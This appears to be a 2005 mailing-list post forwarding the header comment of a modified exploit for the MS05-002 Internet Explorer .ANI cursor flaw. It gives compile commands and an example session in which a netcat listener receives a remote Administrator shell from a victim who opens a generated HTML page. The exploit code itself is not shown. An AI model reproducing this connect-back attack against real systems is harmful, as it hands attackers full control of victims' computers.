Fwd: MS05-002 xploit modification - connectback addition

From: Benn Goldman Rivers (benoror_at_gmail.com)
Date: 01/30/05


Date: Sun, 30 Jan 2005 04:59:13 -0600
To: exploits@k-otik.com, contributor@idefense.com, submissions@packetstormsecurity.org, RazaMexicanaVulnList <vuln@raza-mexicana.org>, vuln-dev@securityfocus.com


Filename with greetings ... sorry

On Sun, 30 Jan 2005 00:41:16 -0600, <benoror@gmail.com> wrote:
> /* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2
> *
> * Copyright (c) 2004-2005 WhiskyCoders.
> *
> * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
> * (CAN-2004-1049)
> *
> * WhiskyCoders - http://bennupg.ath.cx
> * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else in the vulnfact.com crew
> *
> * (universal -- for all affected systems)
> * ---------------------------------------------------------------------
> * Notes:
> * This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit.
> * http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
> * ---------------------------------------------------------------------
> * Description:
> * A remote code execution vulnerability exists in the way that
> * cursor, animated cursor, and icon formats are handled. An attacker
> * could try to exploit the vulnerability by constructing a malicious
> * cursor or icon file that could potentially allow remote code
> * execution if a user visited a malicious Web site or viewed a
> * malicious e-mail message. An attacker who successfully exploited
> * this vulnerability could take complete control of an affected
> * system.
> *
> * ---------------------------------------------------------------------
> * Patch:
> * http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> *
> * ---------------------------------------------------------------------
> * Tested on:
> * - Windows Server 2003
> * - Windows XP SP1
> * - Windows XP SP0
> * - Windows 2000 SP4
> * - Windows 2000 SP3
> * - Windows 2000 SP2
> *
> * ---------------------------------------------------------------------
> * Compile:
> *
> * Win32/VC++ : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Linux : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> *
> * ---------------------------------------------------------------------
> * Example:
> *
> * ATTACKER:
> *
> * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30
> * <...>
> * [*] Creating poc.ani file ... Ok
> * [*] Creating poc.html file ... Ok
> *
> * d00d@whiskybox $ netcat -l -p 7778 -v
> *
> * VICTIM:
> *
> * C:\> iexplore C:\poc.html
> *
> * ATTACKER:
> * d00d@whiskybox $ netcat -l -p 7778 -v
> * Microsoft Windows 2000 [Version 5.00.2195]
> * (C) Copyright 1985-2000 Microsoft Corp.
> *
> * C:\Documents and Settings\Administrator\Desktop>
> *
> * ---------------------------------------------------------------------
> *
> * This is provided as proof-of-concept code only for educational
> * purposes and testing by authorized individuals with permission to
> * do so.
> *
> */